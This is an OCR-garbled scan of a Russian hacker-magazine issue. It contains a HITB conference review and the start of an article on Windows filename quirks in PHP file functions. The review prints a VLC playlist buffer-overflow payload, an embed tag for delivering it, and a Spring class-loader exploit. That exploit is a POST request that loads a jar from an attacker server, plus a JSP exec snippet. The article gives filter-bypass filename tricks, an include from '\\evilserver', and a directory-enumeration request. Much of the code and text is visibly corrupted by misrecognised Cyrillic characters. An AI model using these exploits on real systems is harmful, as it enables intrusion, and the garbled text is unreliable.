<боѵт1оас!иг1>]тббрз : // ѴсІіепб/ѴМмаге- 
Ѵісііепб . ехе</боѵт1оас!иг1> 

</с1іепбСоппесбіоп> 

< / С оп і: і дКо о Ц > 

Если мы можем спуфить сеть и реализовать атаку МІТМ, то не 
составит труда подсунуть приложению паленые обновления с 
нашего поддельного сервера. 

• Еще одной интересной фишкой был баг игі-форвардинга, с помо- 
щью которого можно слать Р05Т-запросы на внутренние ресурсы и 
сканировать виртуальную подсеть, даже если к ней закрыт доступ 
(запросы в этом случае идут с ІР-адреса сервера виртуальных 
машин). 

• Помимо этого были показаны различные варианты спуфинга 
между компонентами ну и, конечно же, модуль для брутфорса паро- 
лей. 

В целом доклад Клаудио был интересным, но ряд угроз, уникальных 
для виртуальной инфраструктуры, в нем все же не были упомянуты. 
К примеру, подмена виртуальной машины во время миграции. По 
этому поводу Клаудио сказал мне, что они работают над эксплои- 
том, который сможет реализовать атаку на практике, и ждут патчей 
от производителей, чтобы выложить в паблик. 

Бинарная плантация 

Следующий доклад был представлен исследователем Митей 
Колсеком из АСР05. Ты наверняка слышал про баг 0І_І_ Ндаскіпд. 
Так вот, эти ребята рассказали все подробности данной атаки, да 
еще и поведали о некоторых новых фишках. Вот список основных 
способов использования уязвимости ОІ_І_ Ндаскіпд: 

• Нажатие на ссылку в браузере 

• Нажатие на ссылку, пришедшую по почте 




Отрывки из моего доклада. Концепт ЗІихпеІ' для 5АР 

• Нажатие на ссылку, пришедшую в ІМ 

• Открытие директории на файловом сервере 

• Документ с БЬЬ в 2ІР-архиве 

• Документ с БЬЬ в 2ІР на Б8В 

• Документ с БББ в 2ІР на СБ 

• Локальное повышение привилегий 

Этого уже немало, но ребята нашли еще одну фишку. При подгруз- 
ке ехе-файлов через функцию СгеаІеРгосезз необходимый файл 
ищется по следующему алгоритму: 

Проверяется директория, из которой запущено приложение 

Текущая рабочая директория (СТО) 

С : Хміпскжз \ зу збешЗ 2 

С : міпскхѵзХзузбет 

С : Ѵ7Іпсіотлз\ 

Зузбет РабЬ.; Бзег РабЬ. 

Тут ничего не поделаешь. Все четко, но при запуске бинарника 
при помощи ЭбеІІЕхесіПе мы получаем такую же картину, только 
без первого пункта! То есть, сперва проверяется текущая рабочая 
директория, а это как раз то, что нам надо. Таким образом, ряды 
более чем четырех сотен приложений, уязвимым к ОІ_І_ Нуаскіпд 
или Віпагу ріапбпд (как называют это исследователи из АСР055), 
пополнили еще 120 уязвимых к ЕХЕ ріапііпд. 

Помимо этого они выпустили тулзу АСР05 Віпагу Ріапбпд Оеіесіог 
(как будто им чужих не хватало :)), с помощью которой простые 
смертные также могут найти уязвимости в других приложениях. Ну 
и конечно, в докладе описаны рекомендации по безопасности для 
разработчиков, админов и юзеров. На сайте ѵѵѵѵѵѵ.ЬіпагурІапІіпд. 
сот можно ознакомиться с последними новостями по данной теме 
и проверить себя на уязвимости. 

Палим кейлогеры 

Все наверняка в курсе, что существуют хардварные кейлогеры, 
которые вставляются между клавиатурой и рз/2-разъемом, позво- 
ляя записывать все нажатия клавиш. На первый взгляд, преиму- 
щество их очевидно: в отличие от софтварных их невозможно 
обнаружить программно. Точнее, было невозможно, пока один 
исследователь не задумался об этом и не предложил решение. Еще 
до доклада, во время общения с автором методики, мне в голову 
пришла мысль, что это тайминги. И я оказался прав. 

Все были удивлены тем фактом, что практически все кейлогеры 
работают по уязвимой для этого метода обнаружения схеме. Сперва 
они получают сигнал от клавиатуры, потом обрабатывают его, а 
затем передают в компьютер. Собственно, на различии во времени 
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между обычным и перехваченным сигналом можно играть, и тем 
самым обнаруживать факт наличия кейлогера. Более подробно 
технические нюансы ты можешь посмотреть в докладе, если раз- 
бираешься в железе (я, честно говоря, в этом не силен). Также в 
докладе описаны и другие методы обнаружения. На самом деле я 
удивлен, почему кейлогеры не работают как прокси, перехватывая 
сигнал незаметно. Полагаю, скоро появится новое поколение кей- 
логеров, которых уже так просто не обнаружить. 

Эксплойты с доставкой на дом 

Исследователь Самуил Шах традиционно выступил в конце конфе- 
ренции, изрядно повеселив публику. Вообще этот индус — отлич- 
ный оратор и профессионал в своей области. Его доклады встре- 
чаются в архивах таких конференций, как ВІаскЬаІ, аж за 2000 год. 
Многим бы следовало поучиться у него именно мастерству ведения 
презентаций и подачи материала. Зачастую бывает так, что серьез- 
ные технические исследования доносятся совершенно безграмотно 
— вот пришел специалист рассказать, как эксплуатировать пере- 
полнение кучи в девайсах с нестандартной архитектурой на какой- 
нибудь «етЬепбеб 05», и мямлит себе под нос, а на слайдах одни 
скриншоты из дебагера. Шанс, что кто-нибудь кроме него поймет, 
что он сказал, а главное — заинтересуется этим, не велик. С другой 
стороны, есть прекрасные ораторы, которые любой самый скучный 
и боянистый доклад могут подать так, что все будут слушать, не 
отрываясь, и друзьям потом пересказывать. Самуил один из них: 
доклад не уступает шоу какого-нибудь Эдди Мерфи. Впрочем, хва- 
тит лирических отступлений, рассмотрим, что же интересного было 
в докладе с технической стороны, ибо атмосферу я все равно не 
передам. 

Доклад назывался «Доставка эксплойтов». Не секрет, что основная 
масса уязвимостей аккумулируется в клиентском софте: есть мно- 
жество браузеров, у них множество плагинов и во всем этом много- 
образии находят тонны уязвимостей. В их эксплуатации обычно 
есть нюанс: чаще всего необходимо заставить пользователя сде- 
лать что-либо: например, перейти по паленой ссылке. 



Самый простой и действенный способ, который сейчас набирает 
обороты - это использование сервисов для сокращения игі (напри- 
мер, Ьіі.іу). К слову, я считаю эти сервисы глобальным злом, и мне 
кажется, что придумали их те, кому выгодно массово троянить 
пользователей под маской удобства. Суди сам: используя сокраще- 
ния ІІРІ_ можно весело вешать браузер, зацикливая несколько ссы- 
лок друг на друга. С двумя ссылками такая вещь уже не катит, но 
если использовать три и более линков — многие браузеры вешают- 
ся. Из той же оперы идея «укорачивания» паленых ссылок, содер- 
жащих подозрительный для персональных файрфолов контент. 

В качестве примера всего вышеописанного был рассмотрен экс- 
плойт переполнения буфера в ѴБС-плеере. Переполнение проис- 
ходит при загрузке «кривого» плейлиста, в котором не проверяется 
длина переменной при занесении в буфер. Классная уязвимость, 
но вот только проэксплуатировать, а точнее впарить пользователю, 
ее не так-то просто. 

Не думаю, что люди часто получают по почте ссылку на плейлист, 
который необходимо проиграть. Согласись, выглядит неестествен- 
но. Но исходник плейлиста все же приложу. 

<?хш1 ѵегзіоп= " 1 . О " епсос!іпд= "ІЛТ-8 " ?> 

<р1ау1ізк ѵегзіоп="1" 

хт1пз= "ЦЦЦр : / /хзрі: . огд/пз/0/ " 

хтіпз : ѵ1с= "ЦЦЦр : / /ѵшлг. ѵісіеоіап . огд/ѵіс/ріауіізк/ 
пз/0/ " > 

<ЦіЦІе>РІау1ізЦ</ЦіШе> 

<ЦгаскЬізЦ> 

<кгаск> 

<1осакіоп> 

зшЬ : //ехатріе . сот@0 .0.0. О / іоо/ # { АААААААА . . . . } 
</1осакіоп> 

<ехкепзіоп 

арр1ісакіоп="Ыі1ір: / /шт. ѵісіеоіап . огд/ѵіс/ 
рІауІізк/О " > 

<ѵ!с : Іс1>0</ѵ1с : іс!> 
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Я с частью команды НІТВ 



□еіесііпе Р5/2 НагсІ^аге Кеуіоввег 



Дпаіуіе тііс Ласа 

► тар іірпэі аі (Ье ЬруЬолгсі 

► Тар 5ідр»вІ аКсг Ніс ксуіащсг 




Отрывок из доклада про обнаружение кейлогеров 

</ехЪепзіоп> 

</Ргаск> 

</ЦгаскЬізЦ> 

</р1ау1ізі:> 

Тут-то как раз и приходят на ум различные ухищрения. Ухищрение 
номер один - разместить эксплоит на зтЬ-шаре. Ухищрение номер 
два - сгенерировать АІрЬа-питегіс шелл-код. Ухищрение номер 
три - сократить этот огромный игі при помощи ЬіТІу. В итоге нам 
остается только внедрить на сайт следующий код 

<етЪес1 Суре= " арріісаціоп/х-ѵіс-ріидіп" 

Ѵ\гіс3.1а1т= " 32 0 " кеідЪР = " 2 00 " 

РагдеС= "кРРр : //Сіпуигі . сош/уссСггі " 

Іс1="ѵ1с" /> 

Прелесть тут заключается в том, что мы и переполнение поэксплуа- 
тировали, и защитные механизмы обошли, ведь никакого подо- 
зрительного шеллкода или ява-скрипта в сгенеренном коде нет. Ну 
и, конечно же, никто не мешает внедрить этот код, используя Х55- 
уязвимость на крупном сайте или популярной соцсети. 

Теперь второй пример: Обау под іе+]аѵа. Внимание, фокус! Как ты 
думаешь, что изображено на этом рисунке? 

Это шелл-код. Да, вот самый настоящий шелл-код, побайт- 
но закодированный в пикселях изображения. Такой шелл-код 
несложно загрузить пользователю в память, поместив его в 
аватар. Плюс в том, что такой код не будет обнаруживаться раз- 



личными антивирусами, но остается вопрос: как, собственно, 
его выполнить?. С приходом всяческих нововведений типа 
НТМІ_5 мы получаем огромное количество новых способов 
обхода средств защиты. К примеру, у нас появился замеча- 
тельный тэг <Сапѵа5>, с помощью которого, используя функцию 
деІітадебаІаП, можно побайтово считать шелл-код из картинки и 
выполнить его. Вот такой хитрый метод был представлен в докла- 
де, а подробности... Ну, ты меня понял :). 

Доим лошадъ, или выполняем 
произвольный код в іаѵа 

Отличное название для отличного доклада. В свое время я хотел 
сделать исследование на эту тему, но все время руки не доходи- 
ли. Было ложное ощущение того, что баѵа реально безопасна, и 
смысла лезть в эту степь нет. Классный парень Медер Кадыралиев 
из Киргизии, сейчас работающий в австралийском Ѳоодіе, сделал 
довольно успешный рисерч на эту тему. Саму Яву он не затронул, но 
вот популярным фреймворкам Арасбе зітиіз?, Эргіпд и бВозз 5еат 
досталось по полной. 

Рассмотрим один из багов в Эргіпд. Там есть технология МѴС, 
которая позволяет создавать объекты автоматически, на основе 
введенных Р05Т-запросов. Уже ясно, что это адское палево, но 
посмотрим дальше. Если, к примеру, вызвать следующий Р05Т- 
запрос: 

РОЗТ /асМизег НТТР/1.0 

изег . асісігезз . зЪгееЦ= БізсІозиге+ЗРг 

Он будет эквивалентен такому вызову на сервере: 

іігтОЪз . деЪІІзег ( ) . деЦАсМгезз ( ) . зеРЗСгееР ( 

"Бізсіозиге ЗРг." ) 

А что же будет, если сделать такой запрос: 

РОЗТ /асМизег НТТР/1.0 

сіазз . сіаззіюасіег . ІШЬз [0] щІаг : кЦЦр : / /аЦЦаскег/зргіпд- 
ехріоір . баг ! / 

Тут мы пытаемся подменить I) РЕ загрузчика классов на ]аг-архив, 
лежащий на нашем сервере. Как результат — мы сможем выпол- 
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ТіпуУКІ* №5 сгеаіей! 







ІИс <оІ аѵѵінд ііи: 

ЬГП&: // с»лтрІ* г Еот йО.ОЖО/ТоФ/ #{Л4ААДіАбААиАААДАЙАДіААААДДА 

А ААААА АА}47нГШ1 III III КН II I Х7СВД АНРС АОАНЛАЦЗ АБ2В ВОавЛВЯРІ А 
йиЛСѵКі^Ів^еН)Й#А&ІСеСіат&лЕ^иалС&И»анМН>ШѵІКНлНООя1іНО 

АААДАААШАААДАААиАААиАААиААААМААМААААМААААААААААААААА 

АААААААААМААААААААААААААААААААААМАААДААААААААААААААААААААА 

АДАМАААМАЛАААААІШАААААА^ЦЦЦІААшААіЦЦІАААААААІЦиййАШАААЛ 
ААиАААААДААААААААААААиААААААААААААААДААААМАААААААААААААМ 
АААААААААААААААААААААААААААААААААААААААААААААААААААААААААААА 
ААШАА АМААМАААААА А А ААААА ААААА АМААШАЛАМ АА АААТО№Т^О V/ № Т 
И іШШІІІ Л $1 7^І)АХРРАПАкАДд 7 АП ІВВОВБДВХРПАНиЛ КІЛ гіСШрЕІЕ} 

брівдисіцнФГевдвдноисРОШік^йЕОнкч ѵікрлічііецінрі крн унхми р 
ОсІСГКцКСНСІ ІСШКиСКСіХіТСІВиі и ІКЧ0Ч4ЕЧНкРПК ІМЯиКСеОІ ЕЧІКи 
сикеч^кйгач^сцсЕлЕРаомкСівннигкмйіігіСйглнііРрСімыниАйхНк 
тКврНОЕ КОІ^іМЧкОІ-ООЁАІѴЧрСІОуНч^І КХврСкНрІ ІОДОРМО К НАІ] 

РІЧГ 7КЧІЖРССЯ РІЦ1 РііС УСИ Р«ЕРА А> 

Гт» • ІегтдІІі аГ 9Ё9 сЬігійегі шпй гѵшйні ш іімг №І№пілд ТшѵИАк игікН Гіи ш ІспдвЬ от 26 сііагаситі; 

МІр : //ЧЫуи гІ-сепъ/ѵссІпГ 

І Ооеі^ Г<*т"*М І 

□г. діѵс ѵаиг гссіріспЪ сопГійе-гш? ж ргеѵіс-л ІіпуІІйЬ: 

ИНр; //ргаѵІотМіп-ігигІ.сот/ѵссІгіГ 



Эксплойт, закодированный в игі 



нить теоретически произвольный код. Но для этого необходима 
еще пара шагов. Загрузчик классов ищет в )аг-архиве ТОБ-файлы, 
которые хранят ссылки на Іад-файлы. 

/МЕТА-ШЕ/зргіпд-ііогт. Ыс! ѵгЬісЪ. сіеіііпез ііогтгіприЕ 
апсі і:огт: :Еогт Еадз: 

<Сад-^і1е> 

<паше>іприС< /пате> 

<ра'ЬЬ.>/МЕТА-ШЕ/Ьадз/Іпри1:Тад . Еад</раЕ]т> 
</Еад-:Еі1е> 

<Еад-^і1е> 

<паше > ^ огш< / пате > 

<раЕЬ>/МЕТА-ІЫЕ/Еадз/ІприЕТад . Еад</раЕЬ> 
</Еад-^і1е> 

А Іад-файлы, в свою очередь, могут хранить )аѵа-код и компилиру- 
ются при загрузке. Таким образом, если в них внедрить следующий 
код, он замечательно выполнится: 

/МЕТА- ШЕ /С ад з/ІприЕТад . Сад : 

<%@ Сад (Іупатіс-аССгіЪиСез= "сіупаССгз " %> 

<% 

3 аѵа . Іапд . КипСіте . деСЕипЕіте ( ) . ехес ( "тксііг /Стр/ 
РШЕВ" ) ; 

%> 

К сожалению, есть одно условие — этот хак сработает, только 
если его проэксплуатировать до первого вызова ізр-сценария, 
что на практике маловероятно, но в связке с каким-нибудь 
йоЗ, который лихо перезагрузит сервер, вполне возможно. 



Я рассмотрел наиболее понятный для неподготовленного 
читателя метод. В докладе Медера было множество очень 
интересных хаков, которые требуют определенных скиллов 
в Яве, но это уже тема для отдельного изучения. Если кому 
интересно, можно обратиться к первоисточнику. Минимальные 
знания ^ѵа необходимы для понимания доклада, для этого 
Медер рекомендовал классную книгу под названием «ТЬіпкіпд 
^ѵа». Кстати, если есть желание ресерчить в данной области, 
можешь писать мне — возможно ты пополнишь ряды 05ЕСР0, 
а потом и сам отправишься выступать на НІТВ с уникальным 
исследованием. 

В заключение 

Вот, пожалуй, и все наиболее интересное. О, чуть не забыл 
крутую тему: на НІТВ'е я серьезно увлекся темой Іоскріскіпд, 
что по-нашему - взламывание замков. Не каких-нибудь 
там электронных, а самых обыкновенных механических. По 
этой теме есть целые группы (к примеру Іоок.пі), а также 
куча докладов и тренингов. Я уже подсадил на это Алексея 
Синцова, так что когда мы с ним прокачаем навыки, то сразу 
расскажем об этом в журнале (естественно, только в ознако- 
мительных целях :)). 

Р5 

Буквально вчера я получил подтверждение на участие с конфе- 
ренции ВІаскбаТ Как и каждый специалист по ИБ, я с детства 
мечтал попасть туда, и вот — еду, но не просто слушателем, а 
докладчиком! И, судя по всему, я буду первым русским (эми- 
гранты не в счет) докладчиком на этой знаменитой конферен- 
ции, чему сам искренне удивлен. Так что жди обзор ВІаскНаІ 
изнутри в ближайших номерах — ты прочтешь это первым на 
страницах X! ц-ц 
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ІЛМІХОЮ 



Сквозь 
тернии 
к файлам! 

Новые уязвимости 
доступа к файлам в РНР 




• Все развивается. На смену одних методов приходят другие, 
продвинутые трюки быстро перестают работать, а сверхновые идеи 
становятся популярным старьем. Особенно эта динамика чувствуется в 
области безопасности веб-приложений, где царит мир рНр-скриптов... 



Какой-нибудь год назад все просто сума схо- 
дили от Еггог-ЬазесІ Му50І_, а ипзегіаііге ка- 
зался чем-то сложным и не встречающимся в 
реальной жизни. Теперьэто уже классические 
техники. Что уж говорить отаких динозаврах 
как нуль-байт в инклудах, на смену которому 
пришел Тііе пате Ігипсаіесі. Исследователи 
постоянно что-то раскапывают, придумывают, 
а тем временем уже выходят новые версии 
интерпретаторов, движков, а с ними - новые 
баги разработчиков. 

По сути, есть три метода найти уязвимость: 
смекалка (когда исследователь придумывает 
какой-нибудьтрюки проверяет, работает 
ли он на практике], анализ исходного кода 
и фаззинг. Об одном интересном китайском 
фаззинге и его развитии с моей стороны я хочу 
тебе рассказать. 

Риггіпд — это ье 
только ценный мех... 

Началось все с то го, что Гугл распоря- 
дился выдачей уже не помню на какой 



запрос и показал сайт на китайском 
языке: Ьир://сосІе.доод1.е.сопп/р/ра5с2а1:/ 
уѵікі/БітрІІГесІСЫпезе . где было собрано 
множество интересных находок китайских 
фаззеров. Интересно, что в списке были 
совсем свежие находки, которые только- 
только публиковались в статьях. Среди них 
нашелся и привлекший мое внимание код 
следующего содержания: 

<?рбр 

^ог ($і = 0; $і<2 55 ; $і + +) 

{ 

$иг1 = ' 1 . рЬ ' . сЪт ( $і ) ; 

$Стр = @Еі1е_деР_сопРеп1із ( $иг1) ; 

ІГ ( ! етрру ( $Ртр) ) 

есЪ.о сЬг ($і) . " \г\п" ; 

} 

?> 

При влек он меня потому, что смысла я не 
понял, но разобрал в описании знакомые 
символы «ѵѵіп32» :). Переводить китайскую 



письменность было странным развлече- 
нием даже с помощью доодіе.ігапзіаіе, по- 
этому я тупо скомпилил этот код под винду 
и посмотрел на результат. Каково же было 
мое удивление, когда обнаружилось, чтоу 
файла в винде существовали как минимум 
4имени: І.рЬР, І.рбр, 1 . р Гі > , 1 . р Гі < . Теперь 
уже китайская письменность не казалась 
мне такой далекой, и переводчик Гугла 
помог понять ее смысл. Собственно, в этом 
самом «смысле» не было ничего больше, 
чем описание кода и результата его работы. 
Не то чтобы не густо — вообще никак! Такое 
положение дел меня не устраивало. До сих 
пор не понимаю этих китайцев — неуже- 
ли им не интересно было понять, какие 
функции еще уязвимы, какие особенности 
у этого бага при эксплуатации, а конце кон- 
цов, почему это вообще работает? 



Йанк^та?РО Должен ия 



Первым делом я добавил второй итератор и 
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Оригинальная заметка в китайской ѴѴікі. 
Наломали, но недодумали... 



АУигпіле іпсі!нДш | г- > [Амиііоп иіДиі!і:| Гаіііні Іи ирт гінмпі 
ІЯВНЯДІЯЖ іі^ С:УРбаді^т РіІ«\ | » | *ч1|Ы-|}]||* 
«ІІ»2 



ЛѴеігпііл^- ілсіічМ) [Гшісвмипсішк) - Ріміні орепіпк Рог 
іпігіиноп (іпсішіс рлЬ' .С рНр5 р*лг) іп С:\Ргвепші 
Рі Іг>'- ші Ііпс 1 



Положительный результат проверки 
существования директории 



запустил код с фа зз и нго муже по двум последним байтам. 
Результаты были непредсказуемы: 

1.р<0 (нуль -байт на конце) 

1.р< (пробел на конце) 

|.Р<" 

1.р<. 

1 .р« 

1 .р» 

1 .р<> 

1 .р>< 

І.р<(р/Р) 

І.р>(р/Р) 

1 . р (Ъ./Н) < 

1 . р (Ь./Н) > 

1.р(Ь/Н) (р/Р) 

Отсюда явно проглядывалисьзакономерности — на 
конце имени файла могли идти символы: точка, двойная 
кавычка, пробел, нуль-байт. Чтобы проверить эту догадку, 
я запустил следующий код: 

<?рЦр 

іб ( бі1е_деб_сопбепбз ( " безб . ркр" . збг_ 
гереаб ( " \ " " , 10 ) . збг_гереаб ( " " , 10 ) . збг_ 
гереаб ( " . " , 10 ) ) ) есРю1337; 

?> 

Как нетрудно догадаться, он вернул 1 337, то есть все ра- 
ботало так, каки было предсказано. Это само по себе было 
уже расширение по символам популярной уязвимости, 
альтернативы нуль-байту в инклудах. После продолжения 
издевательств над интерпретатором были найдены конс- 
трукции имени файла со слэшами на концах, которыетоже 
читались без проблем: 



вольно быстро указали на одно и то же — вызов функции 
РіпбРігзіРіІе. При этом в стеке вызов проходил уже с 
заменой символа >на?,а<на*, двойная кавычка же 
заменялась на точку. Также очень весело было замечать, 
что, несмотря на замену, < не всегда работала как* в 
маске файла, а вот<< всегда хорошо отрабатывала. При 
этом в стеке оба вызова были совершенно одинаковые, 
но давали разный результат (см. рисунок). Теперь стало 
полностью ясно, откуда растут ноги. И ноги действитель- 
но росли изЖподименемМЭ. 

Великий и могучий М50Ы 

Теперь оставалось понять, является ли такое поведение 
функции РіпбРігзіРіІе нормальным, или же здесь имеет 
место баг. Искать ответ на этот вопрос я начал с документа- 
ции : шзбштнсго5д|ТштѴедч = ю/Ц 
азрх . 

В самой документации ничего не говорилось насчет сим- 
волов > < ", зато вотв комментариях... 

Вид? ! 

ТЬе скагасбегз об '<’ апб '>' аге бгеабесі Ііке 
міібсагсі Ьу Цііз бипсбіоп. 

[М8РТ] — бкезе аге Іізбеб іп бйе Ыатіпд А Рііе 
боріс аз іііедаі сЬагасбегз іп рабіі апб бііе 
патез. ТЬаб боріс із Ьеіпд ирбабеб бо таке бМз 
сіеагег . 

Нізбогу 

10/19/2007 

хМагбіап 

5/2/2008 

Магк Атоз — М8РТ 



бі1е\ . / . \ . 

бііе////. 

бі1е\\\. 

бі1е\\.//\/\/\/. 

Думаю, здесь все ясно: если использовать слэши после 
имени файла, то на конце всегда должна стоять точка. 

При этом слэши можно миксовать, и между ними можно 
втыкать одну точку. 

При всем при этом оставалось неясным главное — что 
скрываютсимволы < и >? 

Великий и могучий ѴѴІЫАРІ 

Как мне быстро стало понятно, фаззингом природу этой 
ошибки не поймешь. Оставалось два варианта: смотреть 
сорцы или трассировать вызовы. Оба эти метода до- 



То есть об этом баге было известно еще в 2007 году! А ответ 
производителя вообще потрясал своим содержанием... 
Без комментариев :). На этом, вроде бы, стала оконча- 
тельноясна причина такого поведения РНР. Можнобыло 
приступать к расширен ию области применения данного 
бага. Перепробовав различные варианты, перечитав 
кучу документации (МЭРЫ и правда очень полезен) и 
опробовав сотни идей, я выявил ряд правил, которые 
работа ют для файловых имен в ѴѴІІЧ-системах. Причем 
баг в РіпсІРігзіРіІе способствуеттолько первым четырем 
из них (нулевой пунктне считаем). Также, забегая вперед, 
скажу, что уязвимость касается не только функции біІе_деб_ 
сопіепіз: 

0. Символы * и ? не работаютв именах файлов при вызове 
РіпбРігзіРіІе через РНР (фильтруются). 

1. Символ < заменяется при вызове РіпсІРігзіРіІе на *, 




НТТР://ѴѴѴШ 

■ г 

> Ііпкз 

• Документация 
ФУНКЦИИ РІПСІРІГ5І- 
Рііе: ппзсІп.тісгозоП. 
сот/еп-из/ІіЬга гу/ 
аа364418(ѵ=ѵз.85). 
азрх : 

• Спецификации 
по именам файлов 
(многие трюки 
почерпаны оттуда): 

тзсіп.тісгозоіі. 
сот/еп-из/ІіЬга гу/ 
аа365247(ѵ=ѵз.85). 
азрх : 

• Сведения о 
сокращенных именах 
файлов в ѴѴіпбоѵѵз: 
ІесЬпебтісгозоІі. 
сот/еп-из/ІіЬга гу/ 
сс722482.азрх : 

• Мой блог (отвечаю 
на вопросы, пишу по 
мере сил): охоб.ги . 




> ѵѵагпіпд 



Вся информация 
приведена 
исключительно в 
образовательных 
целях. 

Ответственность за 
любые действия, 
совершенные с ее 
использованием, 
несет только лицо, 
совершившее эти 
действия. 



ХАКЕР 02 [145] 201 1 



► 057 





\Ѵдгліп&: іпсІшІс(а<} (і'исіеі-Іоп. зп -] и<1^|: ййЫ ю ор*п 5ігсаш: 
ІпѵаІісІ аг^итеііі іи і:Тюі>гйііі Кіка\ \ѵьтѵ\1*5І.рІі|і 
Ол Ііп& 2 

ЪѴдгпѵпи тсітіф [Ош^ііоалпсіи^іс]. РаіЫ орелшц ’а^ Гог 
іпеішіоп (іпсЗисІе_раіІі , " І .;С:\рКр5 1 ірмг я ) ш С':\1'гвдг<1т 
ИІ«\ № нѴі№і. ріі р он Ііпс 2 



Отрицательный результат проверки существования 
директории 




Статья АА4д на зпіррег.аі. То же самое, что у китайцев, 
только по-русски 



то есть маску любо го количества любых символов. При этом были 
найдены случаи, когда это работает некорректно (см. картинку). Для 
гарантированной маски * следует использовать <<. 

Пример: іпсіисіе ( ' зЬе11< ' ) подключит файл зЬеІІ*, причем 
если под маску попадет более одного файла, то подключится тот, кото- 
рый идет раньше по алфавиту. 

2. Символ заменяется при вызове РіпбРігзіРіІе на ?, то есть один 
любой символ. 

Пример: іпсіисіе (' зЬеІІ .р>р ' ) подключитфайл зЬеІІ .р?р, 
причем если под маску попадет более одного файла, то подключится 
тот, который идет раньше по алфавиту. 

3. Символ " заменяется при вызове РіпбРігзіРіІе наточку. 

Пример: іпсіисіе (' зЬеІІ "рЬр ' ) эквивалентно 
іпсіисіе ( ' зЬеІІ . рЬр ' ) . 

4. Если первый символ в имени файла — точка, то прочитать файл 
можно по имени без учета этой точки. 

Пример: іореп ( "ЬСассезз " ) эквивалентно іореп( " .ЬСассезз" ) , 
а более навороченно, с использованием п.1 , іореп ( "Ъ .«" ). Так как 
в имени файла вторая буква "а", то по алфавиту он, скорее всего, будет 
первым. 

5. В конце имен файлов можно использовать последовательности из 
слэшей одного или разного вида (прямой и обратный), между кото- 
рыми можно ставить одну точку, причем в конце всегда должна стоять 
точка, и не ", а настоящая. 

Пример: Тореп ( " " ) 

6. Можно использовать сетевые имена, начинающиеся с\\, за которыми 
идетлюбой символ, крометочки. Это очевидно и было известно всем 
давно. Дополню лишь, что если сетевое имя не существует, то на опе- 
рацию с файлом уходятлишние 4 секунды, что способствует истечению 
времени и ошибке тах_ехесибоп_1;іте (смотри статью « Пол ьчатай, 
открой личико» в ][ 04.201 0). Также это позволяет обходить а11оѵт_иг1_ 
іореп=Оіі и делать РЕІ. 

Пример: іпсіисіе ( ' \\еѵі1зегѵег\з]ае11 .рЬр ' ) 

7. Можно использовать расширенные имена, начинающиеся с\\.\, что 
дает возможность переключаться между дисками в имени файла. 
Пример: іпсіисіе ( 1 \\ АС: \гпу\іі1е .рЪр\ . А • А • . \Б: \ 
апоСЬегііІе.рЬр ' ) . 

8. Можно использовать альтернативный синтаксис имени диска для 
обхода фильтрации слэшей. 

Пример: іі1е_деЦ_сопСепСз ( ' С :ЬооС . іпі 1 ) эквивалентно іі1е_ 
деС_сопСепСз ( ' С : /ЬооС . іпі ' ) 

9. Можно использовать короткие 005-совместимые имена файлов и 
директорий. Это боян, не спорю. Но обращаютвое внимание, что если 
в директории находится более четырех файлов, имена которых короче 
трех символов, то та кие имена будут дополнены четырьмя хекс-сим- 
вола ми. Аналогично будет изменено имя файла, если в директории 
находятся более четырех файлов, чьи имена начинаются стехже двух 
первых букв. 

Цитата: «Зресііісаііу , іі тоге СЬап іоиг іііез изе СЬе 
зате зіх-сЬагасСег гооС , асісіідіопаі іііе патез аге 
сгеаСесі Ьу сотЪіпіпд СЬе іігзС Сѵто сЬагасСегз оі СЪ.е 



іііе пате ѵАсЬ. а іоиг-сЬагасСег ЬазЬ. сосіе апсі Ызеп 
аррепсііпд а ипідие сіезідпаСог. А сіігесСогу соиісі Ьаѵе 
іііез патесі МУРАѴО-1 . БОС , МУРАѴО-2 . БОС , МУРАѴО-3 . 

БОС, апсі МУРАѴО-4 . БОС . АсИіЦіопаІ іііез ѵ/іСЪ. СЬ.із 
гооС соиісі Ье патесі МУЗ 140-1. БОС , МУ40С7-1 . БОС , апсі 
МУЕАСС-1 .БОС». 

Пример: іп.сопб имеет 005 имя ІЫ 0763-1 .СОІЧ, то есть его можно 
прочитать строчкой іі1е_деЦ_сопСеп1:з ( ' «Б7бЗ« ' ) , в которой 
вообще не содержится ни байта из настоящего имени файла! Как 
считаются эти четыре хекс-символа нигде не сказано, но они, кажется, 
зависяттолько отимени файла. 

10. В РНР под окружением командной строки (не тоб_рЬр, а рбр.ехе) 
работаетспецифика файлов сзарезервированными именами аих, соп, 
ргп, соті -9, ІрН -9. 

Пример: іі1е_деС_сопСепЦз ( ' С : /Стр/соп Ард ' ) будетбеско- 
нечно читать из устройства СОЫ нуль-байты, ожидая ЕОР. 

Пример: іі1е_риС_сопСепЦз ( ' С : / Стр /соп Ард ' , сЬг ( 0x07 ) ) 
пискнетдинамиком сервера (музыка :)). 

Советую вырезать все пункты и повесить в рамочку на видное место. 
Лишним не будет :). 

«ЕСТЬ ТРИ МЕТОДА НАЙТИ 
УЯЗВИМОСТЬ: СМЕКАЛКА. АНАЛИЗ 
ИСХОДНОГО КОДА И ФАЗЗИНГ» 

Играем в считалочку 

Поверить китайскому в подписи под фаззингом отом, что уязвимость 
касается только біІе_деі_соп1;еп1;з, я просто не мог, хотя бы потому, что 
немного помнил исходники РНР. 

Недолго думая, я проверил все функции, которые вспомнил касательно 
работы с файлами. Результаты оказались более чем положительные. 

Уязвимость присутствует в функциях: 

іореп 

іі1е_деЦ_сопСепЦз 

сору 

рагзе_іпі_іі1е 

геасііііе 

1 і 1е_риЦ_сопСепЦ з 

тксііг 

кетрпаш 

коиск 

то ѵе_ир 1 оасіесі_і і 1 е 
іпсіисіе (_опсе) 
гедиіге (_опсе) 

2ірАгсЬіѵе : : ореп ( ) 
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Магическое отличие вызова * и <. Может Никита 
Тараканов разберется, в чем тут дело? 

Не присутствует в : 

гепате 

ипііпк 

гтсііг 

Есть где разгуляться, не правда ли? Но это еще полбеды. 

РоС: идеи использования 

Очевидно, что данную уязвимость можно использовать для обхо- 
да всевозможных фильтров и ограничений. Например для файла 
.Ыассезв альтернативное имя будет 1і<< (см. п.4, п.1). Двухсимволь- 
ные файлы вообще можно читать без имени (см. п.9.). Ну и так дал ее. 
Есть и другое, не менее интересное применение — определение имен 
папоки файлов. Рассмотрим пример: 

<?ріір 

Ді1е_деД_сопДепДз ( " /ішадез/ " . $_СЕТ [ 1 а ' ] . " . зрд" ) ; 

?> 

С помощьютакого кода можно очень просто получить списокдиректо- 
рий веб-сервера. 




Список функций и результаты проверки. А также 
некоторые комментарии. На английском, так как 
пишу ѵѵННерарег. 



Посылаем запрос ДезД .рЬр?а= . ./а<%00 и получаем ответ вида 

